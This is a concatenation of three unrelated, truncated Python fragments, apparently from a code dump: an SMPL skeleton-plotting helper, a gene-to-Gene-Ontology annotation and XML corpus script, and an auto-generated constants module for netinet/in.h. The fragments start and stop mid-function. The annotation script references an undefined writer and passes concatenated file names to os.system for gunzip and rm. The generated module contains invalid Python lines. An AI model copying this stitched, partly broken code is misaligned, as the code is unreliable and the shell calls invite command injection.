#pelvis = pose_smpl[0].copy()
r_hip = pose_smpl[2].copy()
l_hip = pose_smpl[1].copy()
pelvis = (r_hip + l_hip) / 2
pose_smpl[0] = pelvis
return pose_smpl
""" Limb parents for SMPL joints. """
limb_parents = [ 0,
0, 0, 0,
1, 2, 3, 4,
5, 6, 7, 8,
9, 9, 9,
12,12,12,
16,17,18,19,20,21
]
""" 3D skeleton plot colours for SMPL joints. """
colors = np.array([[0,0,255], [0,255,0], [255,0,0], [255,0,255], [0,255,255], [255,255,0], [127,127,0], [0,127,0], [100,0,100],
[255,0,255], [0,255,0], [0,0,255], [255,255,0], [127,127,0], [100,0,100], [175,100,195],
[0,0,255], [0,255,0], [255,0,0], [255,0,255], [0,255,255], [255,255,0], [127,127,0], [0,127,0], [100,0,100],
[255,0,255], [0,255,0], [0,0,255], [255,255,0], [127,127,0], [100,0,100], [175,100,195]])
def fig2data(fig):
""" Convert a Matplotlib figure to a 4D numpy array with RGBA channels. """
## Draw the renderer
fig.canvas.draw()
## Get the RGBA buffer from the figure
w, h = fig.canvas.get_width_height()
buf = np.fromstring(fig.canvas.tostring_argb(), dtype=np.uint8)
buf.shape = (w, h, 4)
## Roll the ALPHA channel to have it in RGBA mode
buf = np.roll(buf, 3, axis=2)
return buf
def draw_limbs_3d_plt(joints_3d, ax, limb_parents=limb_parents):
## Direct 3d plotting
for i in range(joints_3d.shape[0]):
x_pair = [joints_3d[i, 0], joints_3d[limb_parents[i], 0]]
y_pair = [joints_3d[i, 1], joints_3d[limb_parents[i], 1]]
z_pair = [joints_3d[i, 2], joints_3d[limb_parents[i], 2]]
#ax.text(joints_3d[i, 0], joints_3d[i, 1], joints_3d[i, 2], s=str(i))
ax.plot(x_pair, y_pair, z_pair, color=colors[i]/255.0, linewidth=3, antialiased=True)
def plot_skeleton_3d(joints_3d, flag=-1, limb_parents=limb_parents, title=""):
## 3D Skeleton plotting
fig = plt.figure(frameon=False, figsize=(7, 7))
ax = fig.add_subplot(1, 1, 1, projection='3d')
ax.clear()
## Axis setup
if (flag == 0):
ax.view_init(azim=0, elev=0)
elif (flag == 1):
ax.view_init(azim=90, elev=0)
ax.set_xlim(-200, 200)
ax.set_ylim(-200, 200)
ax.set_zlim(-200, 200)
scale = 1
ax.set_xlabel('x')
ax.set_ylabel('y')
ax.set_zlabel('z')
draw_limbs_3d_plt(joints_3d * scale, ax, limb_parents)
ax.set_title(title)
plt_img = fig2data(fig)
plt.close(fig)
return plt_img
def skeleton_image(joints_2d, img):
""" 2D Joint skeleton Overlay. """
img_copy = img.copy()
for i in range(joints_2d.shape[0]):
x_pair = | |
<gh_stars>1-10
import os
import collections
import sys
import re
import relations
#### GENE - GO DICTIONARY: GENE ID - (GO ID, EVIDENCE CODE, GO NAME, CATEGORY), (...) ####
def dict_g2go(file_g2go):
"""Creates a dictionary of type {gene1:[(GO_ID, Evidence, GO_name, category),
(GO_ID, Evidence, GO_name, category), ...], }
:param file_g2go: file with relations gene to GO
:return: dict of type {gene1:[(GO_ID, Evidence, GO_name, category),
(GO_ID, Evidence, GO_name, category), ...], }
"""
os.system('gunzip -k ' + file_g2go + '.gz')
gene2go = open(file_g2go, 'r', encoding = 'utf-8')
gene2go.readline() # skip header
relations_g2go = gene2go.readlines()
gene2go.close()
relations_g2go.pop()
dict_gene_go = {}
for line in relations_g2go:
line = line.split('\t')
gene_id = line[1]
go = line[2]
evidence = line[3]
name = line[5]
category = line[7][:-1]
if gene_id not in dict_gene_go:
dict_gene_go[gene_id] = []
dict_gene_go[gene_id].append((go, evidence, name, category))
else:
dict_gene_go[gene_id].append((go, evidence, name, category))
os.system('rm ' + file_g2go)
return dict_gene_go
#### REPLACEMENT OF GENE ANNOTATIONS IN DIVIDED BY SENTENCES ANNOTATIONS FOR THEIR MOST REPRESENTATIVE GO ANNOTATION TO DIVIDED BY SENTENCES GO ANNOTATIONS ####
def go_annotations(annotations_path, file_g2go, destination_path):
"""Generates a file for each abstract with the correspondent phenotype and GO annotations,
creates a dictionary of type {gene_id:go_id, gene_id2:go_id, } and
a dictionary of type {gene_name:go_name, gene_name:go_name, }
:param annotations_path: divided by sentences annotations path
:param file_g2go: file with relations gene to GO
:param destination_path: destination path
:return: file for each abstract with the correspondent phenotype and GO annotations,
creates a dictionary of type {gene_id:go_id, gene_id2:go_id, } and
a dictionary of type {gene_name:go_name, gene_name:go_name, }
annotation file example:
26 29 negative regulation of cell proliferation GO_0008285
279 288 bilateral HP_0012832
313 323 unilateral HP_0012833
"""
dict_gene_id_go = dict_g2go(file_g2go)
dict_gene_go_id = {}
dict_gene_go_name = {}
for (dir_path, dir_names, file_names) in os.walk(annotations_path):
for filename in file_names:
annotation_file = open(annotations_path + filename, 'r', encoding = 'utf-8')
contents = annotation_file.readlines()
annotation_file.close()
annotation_file_go = open(destination_path + filename, 'w', encoding = 'utf-8')
save = 0
for line in contents:
line = line.split('\t')
start = int(line[0])
end = int(line[1])
if save != 0:
start = start + save
end = end + save
if line[3].startswith('HP'):
annotation_file_go.write(str(start) + '\t' + str(end) + '\t' + line[2] + '\t' + line[3])
else:
value = False
for key_g, value_tup in dict_gene_id_go.items():
if line[3][:-1] == key_g:
list_evidence = ['EXP', 'IDA', 'IPI', 'IMP', 'IGI', 'IEP', 'HTP',
'HDA', 'HMP', 'HGI', 'HEP', 'ISS', 'ISO', 'ISA',
'ISM', 'IGC', 'IBA', 'IBD', 'IKR', 'IRD', 'RCA',
'TAS', 'NAS', 'IC', 'ND', 'IEA'] # order criteria
bins = collections.defaultdict(list)
for pair in value_tup:
bins[pair[1]].append(pair)
value_tup = [pair for i in list_evidence for pair in bins[i]]
for v_tup in value_tup:
if v_tup[3] == 'Process': # Biological Process
value = True
end = int(line[1]) + len(v_tup[2]) - len(line[2]) + save
save = save + len(v_tup[2]) - len(line[2])
dict_gene_go_id[line[3][:-1]] = v_tup[0].replace(':', '_')
dict_gene_go_name[line[2]] = v_tup[2]
annotation_file_go.write(str(start) + '\t' + str(end) + '\t' + \
v_tup[2] + '\t' + v_tup[0].replace(':', '_') + '\n')
break
if not value: # genes with no associated GO terms or no associated GO terms from Biological Processes
end = int(line[1]) + len('biological_process') - len(line[2]) + save
save = save + len('biological_process') - len(line[2])
dict_gene_go_id[line[3][:-1]] = 'GO_0008150'
dict_gene_go_name[line[2]] = 'biological_process'
annotation_file_go.write(str(start) + '\t' + str(end) + '\t' + \
'biological_process' + '\t' + 'GO_0008150' + '\n')
annotation_file_go.close()
return dict_gene_go_id, dict_gene_go_name
#### XML FORMAT GENE AND PHENOTYPE CORPUS ####
def pgr_gene(verify_file, destination_path, type = None):
"""Generates a .xml file for each abstract with sentences with relations in corpus with the correspondent phenotype and gene annotations
:param verify_file: file with sentences with relations verified (for test corpus)
or file with sentences with relations not verified (for train corpus)
or file with all the relations (for corpus without curator correction)
:param destination_path: destination path
:param type: type (optional) if pretended file is a test corpus file
:return: .xml file for each abstract with sentences with relations in corpus with the correspondent phenotype and gene annotations of type:
<sentence id="s0" text="In addition, the coexistence of high MACC1 and low NM23-H1 expression and tumor budding
was associated with short OS (p AAAA 0.001).">
<entity id="s0.e1" charOffset="51-55"
type="GENE" text="NM23" ontology_id="4830"/>
<entity id="s0.e2" charOffset="74-79"
type="HP" text="tumor" ontology_id="HP_0002664"/>
<pair id="s0.p1" e1="s0.e1"
e2="s0.e2" pgr="true"/>
</sentence>
"""
verify = open(verify_file, 'r', encoding = 'utf-8')
verify.readline() # skip header
verify_relations = [line.split('\t') for line in verify]
verify.close()
verify_relations.sort(key=lambda x: int(x[0])) # sort by abstract identifier
iterator = 1
sentence_number = 1
entity_number = 1
pair_number = 1
dict_entities = {}
dict_pairs = {}
for line in verify_relations:
abstract = line[0]
sentence = line[1]
gene = line[2]
phenotype = line[3]
gene_id = line[4]
phenotype_id = line[5]
gene_start_position = line[6]
gene_end_position = line[7]
phenotype_start_position = line[8]
phenotype_end_position = line[9]
if type:
relation = line[10]
else:
relation = line[10][:-1]
if verify_relations[iterator - 2][0] == abstract: # same abstract
if verify_relations[iterator - 2][1] == sentence: # same sentence
if int(gene_start_position) < int(phenotype_start_position):
dict_entities[entity_number] = []
dict_entities[entity_number].append((gene, '\t\t' + '<entity id="s' + str(sentence_number) + '.e' + str(entity_number) + '" charOffset="' + gene_start_position + '-' + \
gene_end_position + '"\n\t\t\t' + 'type="' + 'GENE' + '" text="' \
+ gene + '" ontology_id="' + gene_id + '"/>' + '\n'))
entity_number += 1
dict_entities[entity_number] = []
dict_entities[entity_number].append((phenotype, '\t\t' + '<entity id="s' + str(sentence_number) + '.e' + str(entity_number) + '" charOffset="' + phenotype_start_position + '-' + \
phenotype_end_position + '"\n\t\t\t' + 'type="' + 'HP' + '" text="' \
+ phenotype + '" ontology_id="' + phenotype_id + '"/>' + '\n'))
entity_number += 1
else:
dict_entities[entity_number] = []
dict_entities[entity_number].append((phenotype, '\t\t' + '<entity id="s' + str(sentence_number) + '.e' + str(entity_number) + '" charOffset="' + phenotype_start_position + '-' + \
phenotype_end_position + '"\n\t\t\t' + 'type="' + 'HP' + '" text="' \
+ phenotype + '" ontology_id="' + phenotype_id + '"/>' + '\n'))
entity_number += 1
dict_entities[entity_number] = []
dict_entities[entity_number].append((gene, '\t\t' + '<entity id="s' + str(sentence_number) + '.e' + str(entity_number) + '" charOffset="' + gene_start_position + '-' + \
gene_end_position + '"\n\t\t\t' + 'type="' + 'GENE' + '" text="' \
+ gene + '" ontology_id="' + gene_id + '"/>' + '\n'))
entity_number += 1
dict_pairs[pair_number] = []
dict_pairs[pair_number].append(((entity_number - 2, entity_number - 1),'\t\t' + '<pair id="s' + str(sentence_number) + '.p' + str(pair_number) + '" e1="s' + str(sentence_number) + \
'.e' + str(entity_number - 2) + '"\n\t\t ' + 'e2="s' + str(sentence_number) + '.e' + str(entity_number - 1) + '" pgr="' + relation.lower() + '"/>' + '\n'))
pair_number += 1
else: # different sentence
pair_number = 1
entity_number = 1
list_entities = sorted(dict_entities.items())
used_entities_list = []
used_numbers_list = []
to_write_entities = []
right_number = 1
save_alterations = {}
for element in range(1, len(list_entities) + 1):
if list_entities[element - 1][1][0][0] not in used_entities_list:
to_write_entities.append(str(list_entities[element - 1][1][0][1]).replace('e' + str(list_entities[element - 1][0]), 'e' + str(right_number)))
used_entities_list.append(list_entities[element - 1][1][0][0])
used_numbers_list.append((list_entities[element - 1][1][0][0], element))
save_alterations['e' + str(list_entities[element - 1][0])] = 'e' + str(right_number)
right_number += 1
else:
for used_number in used_numbers_list:
if used_number[0] == list_entities[element - 1][1][0][0]:
save_alterations['e' + str(element)] = 'e' + str(used_number[1])
organized_writing = []
for line_to_write in to_write_entities:
first_offset = int(line_to_write.split('charOffset="')[1].split('"\n\t\t\t')[0].split('-')[0])
organized_writing.append((first_offset, line_to_write))
organized_writing = sorted(organized_writing, key=lambda tup: tup[0])
new_entity_number = 1
used_keys = []
for organized_tuple in organized_writing:
original_entity_number = int(organized_tuple[1].split('.e')[1].split('" charOffset="')[0])
writer.write(re.sub(r'.e[0-9]+', '.e' + str(new_entity_number), organized_tuple[1]))
for key, value in save_alterations.items():
if value == 'e' + str(original_entity_number) and key not in used_keys:
save_alterations[key] = 'e' + str(new_entity_number)
used_keys.append(key)
new_entity_number += 1
dict_entities = {}
list_pairs = sorted(dict_pairs.items())
for pair in list_pairs:
writer.write(str(pair[1][0][1].replace('.e' + str(pair[1][0][0][0]), '.' + save_alterations['e' + str(pair[1][0][0][0])]).replace('.e' + str(pair[1][0][0][1]), '.' + save_alterations['e' + str(pair[1][0][0][1])])))
dict_pairs = {}
writer.write('\t' + '</sentence>' + '\n')
sentence_number += 1
sentence = sentence.replace(' <', ' l').replace('(<', '(l').replace('(p<', '(pl').replace(' < ', ' l ').replace('."', '.AAAAA').replace('>', 'AAAA').replace('"', 'AAAAAA').replace('<','AAAA').replace('&', 'AAAAA').split('\n')[0] # avoid invalid (bad/not well-formed) XML
writer.write('\t' + '<sentence id="s' + str(sentence_number) + '" text="' + sentence + '">' + '\n')
if int(gene_start_position) < int(phenotype_start_position):
dict_entities[entity_number] = []
dict_entities[entity_number].append((gene,
'\t\t' + '<entity id="s' + str(sentence_number) + '.e' + str(entity_number) + '" charOffset="' + gene_start_position + '-' + \
gene_end_position + '"\n\t\t\t' + 'type="' + 'GENE' + '" text="' \
+ gene + '" ontology_id="' + gene_id + '"/>' | |
# Generated by h2py from /usr/include/netinet/in.h
_NETINET_IN_H = 1
# Included from features.h
_FEATURES_H = 1
__USE_ANSI = 1
__FAVOR_BSD = 1
_ISOC99_SOURCE = 1
_POSIX_SOURCE = 1
_POSIX_C_SOURCE = 200809L
_XOPEN_SOURCE = 700
_XOPEN_SOURCE_EXTENDED = 1
_LARGEFILE64_SOURCE = 1
_BSD_SOURCE = 1
_SVID_SOURCE = 1
_ATFILE_SOURCE = 1
_BSD_SOURCE = 1
_SVID_SOURCE = 1
__USE_ISOC99 = 1
__USE_ISOC95 = 1
_POSIX_SOURCE = 1
_POSIX_C_SOURCE = 2
_POSIX_C_SOURCE = 199506L
_POSIX_C_SOURCE = 200112L
_POSIX_C_SOURCE = 200809L
__USE_POSIX_IMPLICITLY = 1
__USE_POSIX = 1
__USE_POSIX2 = 1
__USE_POSIX199309 = 1
__USE_POSIX199506 = 1
__USE_XOPEN2K = 1
__USE_ISOC99 = 1
__USE_XOPEN2K8 = 1
_ATFILE_SOURCE = 1
__USE_XOPEN = 1
__USE_XOPEN_EXTENDED = 1
__USE_UNIX98 = 1
_LARGEFILE_SOURCE = 1
__USE_XOPEN2K8 = 1
__USE_XOPEN2K = 1
__USE_ISOC99 = 1
__USE_XOPEN_EXTENDED = 1
__USE_LARGEFILE = 1
__USE_LARGEFILE64 = 1
__USE_FILE_OFFSET64 = 1
__USE_MISC = 1
__USE_BSD = 1
__USE_SVID = 1
__USE_ATFILE = 1
__USE_GNU = 1
__USE_REENTRANT = 1
__USE_FORTIFY_LEVEL = 2
__USE_FORTIFY_LEVEL = 1
__USE_FORTIFY_LEVEL = 0
# Included from bits/predefs.h
__STDC_IEC_559__ = 1
__STDC_IEC_559_COMPLEX__ = 1
__STDC_ISO_10646__ = 200009L
__GNU_LIBRARY__ = 6
__GLIBC__ = 2
__GLIBC_MINOR__ = 11
__GLIBC_HAVE_LONG_LONG = 1
# Included from sys/cdefs.h
_SYS_CDEFS_H = 1
def __NTH(fct): return fct
def __NTH(fct): return fct
def __P(args): return args
def __PMT(args): return args
def __STRING(x): return #x
def __bos(ptr): return __builtin_object_size (ptr, __USE_FORTIFY_LEVEL > 1)
def __bos0(ptr): return __builtin_object_size (ptr, 0)
def __warnattr(msg): return __attribute__((__warning__ (msg)))
__flexarr = []
__flexarr = [0]
__flexarr = []
__flexarr = [1]
def __ASMNAME(cname): return __ASMNAME2 (__USER_LABEL_PREFIX__, cname)
def __attribute__(xyz): return
def __attribute_format_arg__(x): return __attribute__ ((__format_arg__ (x)))
def __attribute_format_arg__(x): return
# Included from bits/wordsize.h
__WORDSIZE = 32
__LDBL_COMPAT = 1
def __LDBL_REDIR_DECL(name): return \
__USE_LARGEFILE = 1
__USE_LARGEFILE64 = 1
__USE_EXTERN_INLINES = 1
__USE_EXTERN_INLINES_IN_LIBC = 1
# Included from gnu/stubs.h
# Included from stdint.h
_STDINT_H = 1
# Included from bits/wchar.h
_BITS_WCHAR_H = 1
__WCHAR_MAX = (2147483647)
__WCHAR_MIN = (-__WCHAR_MAX - 1)
def __INT64_C(c): return c ## L
def __UINT64_C(c): return c ## UL
def __INT64_C(c): return c ## LL
def __UINT64_C(c): return c ## ULL
INT8_MIN = (-128)
INT16_MIN = (-32767-1)
INT32_MIN = (-2147483647-1)
INT64_MIN = (-__INT64_C(9223372036854775807)-1)
INT8_MAX = (127)
INT16_MAX = (32767)
INT32_MAX = (2147483647)
INT64_MAX = (__INT64_C(9223372036854775807))
UINT8_MAX = (255)
UINT16_MAX = (65535)
UINT64_MAX = (__UINT64_C(18446744073709551615))
INT_LEAST8_MIN = (-128)
INT_LEAST16_MIN = (-32767-1)
INT_LEAST32_MIN = (-2147483647-1)
INT_LEAST64_MIN = (-__INT64_C(9223372036854775807)-1)
INT_LEAST8_MAX = (127)
INT_LEAST16_MAX = (32767)
INT_LEAST32_MAX = (2147483647)
INT_LEAST64_MAX = (__INT64_C(9223372036854775807))
UINT_LEAST8_MAX = (255)
UINT_LEAST16_MAX = (65535)
UINT_LEAST64_MAX = (__UINT64_C(18446744073709551615))
INT_FAST8_MIN = (-128)
INT_FAST16_MIN = (-9223372036854775807L-1)
INT_FAST32_MIN = (-9223372036854775807L-1)
INT_FAST16_MIN = (-2147483647-1)
INT_FAST32_MIN = (-2147483647-1)
INT_FAST64_MIN = (-__INT64_C(9223372036854775807)-1)
INT_FAST8_MAX = (127)
INT_FAST16_MAX = (9223372036854775807L)
INT_FAST32_MAX = (9223372036854775807L)
INT_FAST16_MAX = (2147483647)
INT_FAST32_MAX = (2147483647)
INT_FAST64_MAX = (__INT64_C(9223372036854775807))
UINT_FAST8_MAX = (255)
UINT_FAST64_MAX = (__UINT64_C(18446744073709551615))
INTPTR_MIN = (-9223372036854775807L-1)
INTPTR_MAX = (9223372036854775807L)
INTPTR_MIN = (-2147483647-1)
INTPTR_MAX = (2147483647)
INTMAX_MIN = (-__INT64_C(9223372036854775807)-1)
INTMAX_MAX = (__INT64_C(9223372036854775807))
UINTMAX_MAX = (__UINT64_C(18446744073709551615))
PTRDIFF_MIN = (-9223372036854775807L-1)
PTRDIFF_MAX = (9223372036854775807L)
PTRDIFF_MIN = (-2147483647-1)
PTRDIFF_MAX = (2147483647)
SIG_ATOMIC_MIN = (-2147483647-1)
SIG_ATOMIC_MAX = (2147483647)
WCHAR_MIN = __WCHAR_MIN
WCHAR_MAX = __WCHAR_MAX
def INT8_C(c): return c
def INT16_C(c): return c
def INT32_C(c): return c
def INT64_C(c): return c ## L
def INT64_C(c): return c ## LL
def UINT8_C(c): return c
def UINT16_C(c): return c
def UINT32_C(c): return c ## U
def UINT64_C(c): return c ## UL
def UINT64_C(c): return c ## ULL
def INTMAX_C(c): return c ## L
def UINTMAX_C(c): return c ## UL
def INTMAX_C(c): return c ## LL
def UINTMAX_C(c): return c ## ULL
# Included from sys/socket.h
_SYS_SOCKET_H = 1
# Included from sys/uio.h
_SYS_UIO_H = 1
from TYPES import *
# Included from bits/uio.h
_BITS_UIO_H = 1
from TYPES import *
UIO_MAXIOV = 1024
# Included from bits/sigset.h
_SIGSET_H_types = 1
_SIGSET_H_fns = 1
def __sigword(sig): return (((sig) - 1) >> 5)
def __sigemptyset(set): return \
def __sigfillset(set): return \
def __sigisemptyset(set): return \
# Included from bits/socket.h
__BITS_SOCKET_H = 1
# Included from limits.h
_LIBC_LIMITS_H_ = 1
MB_LEN_MAX = 16
_LIMITS_H = 1
CHAR_BIT = 8
SCHAR_MIN = (-128)
SCHAR_MAX = 127
UCHAR_MAX = 255
CHAR_MIN = 0
CHAR_MAX = UCHAR_MAX
CHAR_MIN = SCHAR_MIN
CHAR_MAX = SCHAR_MAX
SHRT_MIN = (-32768)
SHRT_MAX = 32767
USHRT_MAX = 65535
INT_MAX = 2147483647
LONG_MAX = 9223372036854775807L
LONG_MAX = 2147483647L
LONG_MIN = (-LONG_MAX - 1L)
# Included from bits/posix1_lim.h
_BITS_POSIX1_LIM_H = 1
_POSIX_AIO_LISTIO_MAX = 2
_POSIX_AIO_MAX = 1
_POSIX_ARG_MAX = 4096
_POSIX_CHILD_MAX = 25
_POSIX_CHILD_MAX = 6
_POSIX_DELAYTIMER_MAX = 32
_POSIX_HOST_NAME_MAX = 255
_POSIX_LINK_MAX = 8
_POSIX_LOGIN_NAME_MAX = 9
_POSIX_MAX_CANON = 255
_POSIX_MAX_INPUT = 255
_POSIX_MQ_OPEN_MAX = 8
_POSIX_MQ_PRIO_MAX = 32
_POSIX_NAME_MAX = 14
_POSIX_NGROUPS_MAX = 8
_POSIX_NGROUPS_MAX = 0
_POSIX_OPEN_MAX = 20
_POSIX_OPEN_MAX = 16
_POSIX_FD_SETSIZE = _POSIX_OPEN_MAX
_POSIX_PATH_MAX = 256
_POSIX_PIPE_BUF = 512
_POSIX_RE_DUP_MAX = 255
_POSIX_RTSIG_MAX = 8
_POSIX_SEM_NSEMS_MAX = 256
_POSIX_SEM_VALUE_MAX = 32767
_POSIX_SIGQUEUE_MAX = 32
_POSIX_SSIZE_MAX = 32767
_POSIX_STREAM_MAX = 8
_POSIX_SYMLINK_MAX = 255
_POSIX_SYMLOOP_MAX = 8
_POSIX_TIMER_MAX = 32
_POSIX_TTY_NAME_MAX = 9
_POSIX_TZNAME_MAX = 6
_POSIX_QLIMIT = 1
_POSIX_HIWAT = _POSIX_PIPE_BUF
_POSIX_UIO_MAXIOV = 16
_POSIX_CLOCKRES_MIN = 20000000
# Included from bits/local_lim.h
# Included from sys/syslimits.h
ARG_MAX = 262144
CHILD_MAX = 40
LINK_MAX = 32767
MAX_CANON = 255
MAX_INPUT = 255
NAME_MAX = 255
NGROUPS_MAX = 1023
OPEN_MAX = 64
PATH_MAX = 1024
PIPE_BUF = 512
IOV_MAX = 1024
_POSIX_THREAD_KEYS_MAX = 128
PTHREAD_KEYS_MAX = 1024
_POSIX_THREAD_DESTRUCTOR_ITERATIONS = 4
PTHREAD_DESTRUCTOR_ITERATIONS = _POSIX_THREAD_DESTRUCTOR_ITERATIONS
_POSIX_THREAD_THREADS_MAX = 64
PTHREAD_THREADS_MAX = 1024
AIO_PRIO_DELTA_MAX = 20
PTHREAD_STACK_MIN = 16384
TIMER_MAX = 256
DELAYTIMER_MAX = 2147483647
SSIZE_MAX = LONG_MAX
NGROUPS_MAX = 8
# Included from bits/posix2_lim.h
_BITS_POSIX2_LIM_H = 1
_POSIX2_BC_BASE_MAX = 99
_POSIX2_BC_DIM_MAX = 2048
_POSIX2_BC_SCALE_MAX = 99
_POSIX2_BC_STRING_MAX = 1000
_POSIX2_COLL_WEIGHTS_MAX = 2
_POSIX2_EXPR_NEST_MAX = 32
_POSIX2_LINE_MAX = 2048
_POSIX2_RE_DUP_MAX = 255
_POSIX2_CHARCLASS_NAME_MAX = 14
BC_BASE_MAX = _POSIX2_BC_BASE_MAX
BC_DIM_MAX = _POSIX2_BC_DIM_MAX
BC_SCALE_MAX = _POSIX2_BC_SCALE_MAX
BC_STRING_MAX = _POSIX2_BC_STRING_MAX
COLL_WEIGHTS_MAX = 255
EXPR_NEST_MAX = _POSIX2_EXPR_NEST_MAX
LINE_MAX = _POSIX2_LINE_MAX
CHARCLASS_NAME_MAX = 2048
RE_DUP_MAX = (0x7fff)
# Included from bits/xopen_lim.h
_XOPEN_LIM_H = 1
# Included from bits/stdio_lim.h
L_tmpnam = 20
TMP_MAX = 238328
FILENAME_MAX = 1024
L_ctermid = 9
L_cuserid = 9
FOPEN_MAX = 64
IOV_MAX = 1024
_XOPEN_IOV_MAX = _POSIX_UIO_MAXIOV
NL_ARGMAX = _POSIX_ARG_MAX
NL_LANGMAX = _POSIX2_LINE_MAX
NL_MSGMAX = INT_MAX
NL_NMAX = INT_MAX
NL_SETMAX = INT_MAX
NL_TEXTMAX = INT_MAX
NZERO = 20
WORD_BIT = 16
WORD_BIT = 32
WORD_BIT = 64
WORD_BIT = 16
WORD_BIT = 32
WORD_BIT = 64
WORD_BIT = 32
LONG_BIT = 32
LONG_BIT = 64
LONG_BIT = 32
LONG_BIT = 64
LONG_BIT = 64
LONG_BIT = 32
# Included from bits/types.h
_BITS_TYPES_H = 1
__S32_TYPE = int
__SWORD_TYPE = int
__SLONG32_TYPE = int
# Included from bits/typesizes.h
_BITS_TYPESIZES_H = 1
__PID_T_TYPE = __S32_TYPE
__CLOCK_T_TYPE = __S32_TYPE
__SWBLK_T_TYPE = __S32_TYPE
__CLOCKID_T_TYPE = __S32_TYPE
__TIMER_T_TYPE = __S32_TYPE
__SSIZE_T_TYPE = __SWORD_TYPE
__FD_SETSIZE = 1024
PF_UNSPEC = 0
PF_LOCAL = 1
PF_UNIX = PF_LOCAL
PF_FILE = PF_LOCAL
PF_INET = 2
PF_IMPLINK = 3
PF_PUP = 4
PF_CHAOS = 5
PF_NS = 6
PF_ISO = 7
PF_OSI = PF_ISO
PF_ECMA = 8
PF_DATAKIT = 9
PF_CCITT = 10
PF_SNA = 11
PF_DECnet = 12
PF_DLI = 13
PF_LAT = 14
PF_HYLINK = 15
PF_APPLETALK = 16
PF_ROUTE = 17
PF_LINK = 18
PF_XTP = 19
PF_COIP = 20
PF_CNT = 21
PF_RTIP = 22
PF_IPX = 23
PF_SIP = 24
PF_PIP = 25
PF_ISDN = 26
PF_KEY = 27
PF_INET6 = 28
PF_NATM = 29
PF_ATM = 30
PF_HDRCMPLT = 31
PF_NETGRAPH = 32
PF_MAX = 33
AF_UNSPEC = PF_UNSPEC
AF_LOCAL = PF_LOCAL
AF_UNIX = PF_UNIX
AF_FILE = PF_FILE
AF_INET = PF_INET
AF_IMPLINK = PF_IMPLINK
AF_PUP = PF_PUP
AF_CHAOS = PF_CHAOS
AF_NS = PF_NS
AF_ISO = PF_ISO
AF_OSI = PF_OSI
AF_ECMA = PF_ECMA
AF_DATAKIT = PF_DATAKIT
AF_CCITT = PF_CCITT
AF_SNA = PF_SNA
AF_DECnet = PF_DECnet
AF_DLI = PF_DLI
AF_LAT = PF_LAT
AF_HYLINK = PF_HYLINK
AF_APPLETALK = PF_APPLETALK
AF_ROUTE = PF_ROUTE
AF_LINK = PF_LINK
pseudo_AF_XTP = PF_XTP
AF_COIP = PF_COIP
AF_CNT = PF_CNT
pseudo_AF_RTIP = PF_RTIP
AF_IPX = PF_IPX
AF_SIP = PF_SIP
pseudo_AF_PIP = PF_PIP
AF_ISDN = PF_ISDN
AF_E164 = AF_ISDN
pseudo_AF_KEY = PF_KEY
AF_INET6 = PF_INET6
AF_NATM = PF_NATM
AF_ATM = PF_ATM
pseudo_AF_HDRCMPLT = PF_HDRCMPLT
AF_NETGRAPH = PF_NETGRAPH
AF_MAX = PF_MAX
SOMAXCONN = 128
# Included from bits/sockaddr.h
_BITS_SOCKADDR_H = 1
def __SOCKADDR_COMMON(sa_prefix): return \
_HAVE_SA_LEN = 1
_SS_SIZE = 128
def CMSG_FIRSTHDR(mhdr): return \
CMGROUP_MAX = 16
SOL_SOCKET = 0xffff
LOCAL_PEERCRED = 0x001
LOCAL_CREDS = 0x002
LOCAL_CONNWAIT = 0x004
# Included from bits/socket2.h
def IN_CLASSA(a): return ((((in_addr_t)(a)) & (-2147483648)) == 0)
IN_CLASSA_NET = (-16777216)
IN_CLASSA_NSHIFT = 24
IN_CLASSA_HOST = ((-1) & ~IN_CLASSA_NET)
IN_CLASSA_MAX = 128
def IN_CLASSB(a): return ((((in_addr_t)(a)) & (-1073741824)) == (-2147483648))
IN_CLASSB_NET = (-65536)
IN_CLASSB_NSHIFT = 16
IN_CLASSB_HOST = ((-1) & ~IN_CLASSB_NET)
IN_CLASSB_MAX = 65536
def IN_CLASSC(a): return ((((in_addr_t)(a)) & (-536870912)) == (-1073741824))
IN_CLASSC_NET = (-256)
IN_CLASSC_NSHIFT = 8
IN_CLASSC_HOST = ((-1) & ~IN_CLASSC_NET)
def IN_CLASSD(a): return ((((in_addr_t)(a)) & (-268435456)) == (-536870912))
def IN_MULTICAST(a): return IN_CLASSD(a)
def IN_EXPERIMENTAL(a): return ((((in_addr_t)(a)) & (-536870912)) == (-536870912))
def IN_BADCLASS(a): return ((((in_addr_t)(a)) & (-268435456)) == (-268435456))
IN_LOOPBACKNET = 127
INET_ADDRSTRLEN = 16
INET6_ADDRSTRLEN = 46
# Included from bits/in.h
IMPLINK_IP = 155
IMPLINK_LOWEXPER = 156
IMPLINK_HIGHEXPER = 158
IPPROTO_DIVERT = 258
SOL_IP = 0
IP_OPTIONS = 1
IP_HDRINCL = 2
IP_TOS = 3
IP_TTL = 4
IP_RECVOPTS = 5
IP_RECVRETOPTS = 6
IP_RECVDSTADDR = 7
IP_SENDSRCADDR = IP_RECVDSTADDR
IP_RETOPTS = 8
IP_MULTICAST_IF = 9
IP_MULTICAST_TTL = 10
IP_MULTICAST_LOOP = 11
IP_ADD_MEMBERSHIP = 12
IP_DROP_MEMBERSHIP = 13
IP_MULTICAST_VIF = 14
IP_RSVP_ON = 15
IP_RSVP_OFF = 16
IP_RSVP_VIF_ON = 17
IP_RSVP_VIF_OFF = 18
IP_PORTRANGE = 19
IP_RECVIF = 20
IP_IPSEC_POLICY = 21
IP_FAITH = 22
IP_ONESBCAST = 23
IP_NONLOCALOK = 24
IP_FW_TABLE_ADD = 40
IP_FW_TABLE_DEL = 41
IP_FW_TABLE_FLUSH = 42
IP_FW_TABLE_GETSIZE = 43
IP_FW_TABLE_LIST = 44
IP_FW_ADD = 50
IP_FW_DEL = 51
IP_FW_FLUSH = 52
IP_FW_ZERO = 53
IP_FW_GET = 54
IP_FW_RESETLOG = 55
IP_FW_NAT_CFG = 56
IP_FW_NAT_DEL = 57
IP_FW_NAT_GET_CONFIG = 58
IP_FW_NAT_GET_LOG = 59
IP_DUMMYNET_CONFIGURE = 60
IP_DUMMYNET_DEL = 61
IP_DUMMYNET_FLUSH = 62
IP_DUMMYNET_GET = 64
IP_RECVTTL = 65
IP_MINTTL = 66
IP_DONTFRAG = 67
IP_ADD_SOURCE_MEMBERSHIP = 70
IP_DROP_SOURCE_MEMBERSHIP = 71
IP_BLOCK_SOURCE = 72
IP_UNBLOCK_SOURCE = 73
IP_MSFILTER = 74
MCAST_JOIN_GROUP = 80
MCAST_LEAVE_GROUP = 81
MCAST_JOIN_SOURCE_GROUP = 82
MCAST_LEAVE_SOURCE_GROUP = 83
